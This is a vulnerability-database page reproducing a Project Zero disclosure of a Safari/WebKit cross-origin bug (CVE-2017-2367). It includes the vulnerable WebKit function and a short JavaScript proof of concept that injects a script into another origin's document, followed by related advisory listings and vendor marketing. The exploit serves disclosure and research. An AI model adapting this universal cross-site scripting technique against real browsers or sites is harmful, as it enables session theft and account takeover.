| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
| Safari < 10.1 Multiple Vulnerabilities | 31 Mar 201700:00 | – | nessus | |
| Apple iOS < 10.3 Multiple Vulnerabilities | 31 Mar 201700:00 | – | nessus | |
| Apple TV < 10.2 Multiple Vulnerabilities | 2 Apr 201700:00 | – | nessus | |
| Apple TV < 10.2 Multiple Vulnerabilities | 10 Apr 201700:00 | – | nessus | |
| Apple iOS < 10.3 Multiple Vulnerabilities | 31 Mar 201700:00 | – | nessus | |
| GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities | 8 Jun 201700:00 | – | nessus | |
| macOS : Apple Safari < 10.1 Multiple Vulnerabilities | 3 Apr 201700:00 | – | nessus | |
| Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3257-1) | 11 Apr 201700:00 | – | nessus | |
| Linux Distros Unpatched Vulnerability : CVE-2017-2367 | 10 Sep 202500:00 | – | nessus | |
| About the security content of iOS 10.3 | 27 Mar 201700:00 | – | apple |
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1063
The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.
static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)
{
...
Document* document = frame.document(); <<-------- the new document.
if (is<HTMLDocument>(*document)) {
auto& htmlDocument = downcast<HTMLDocument>(*document);
auto* atomicPropertyName = propertyName.publicName();
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {
JSValue namedItem;
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);
ASSERT(collection->length() > 1);
namedItem = toJS(exec, thisObject->globalObject(), collection);
} else
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);
return true;
}
}
return false;
}
PoC:
-->
"use strict";
let f = document.body.appendChild(document.createElement("iframe"));
let get_element = f.contentWindow.Function("return logo;");
f.onload = () => {
f.onload = null;
let node = get_element();
var sc = document.createElement("script");
sc.innerText = "alert(location)";
node.appendChild(sc);
};
f.src = "https://abc.xyz/";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
# 0day.today [2018-04-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation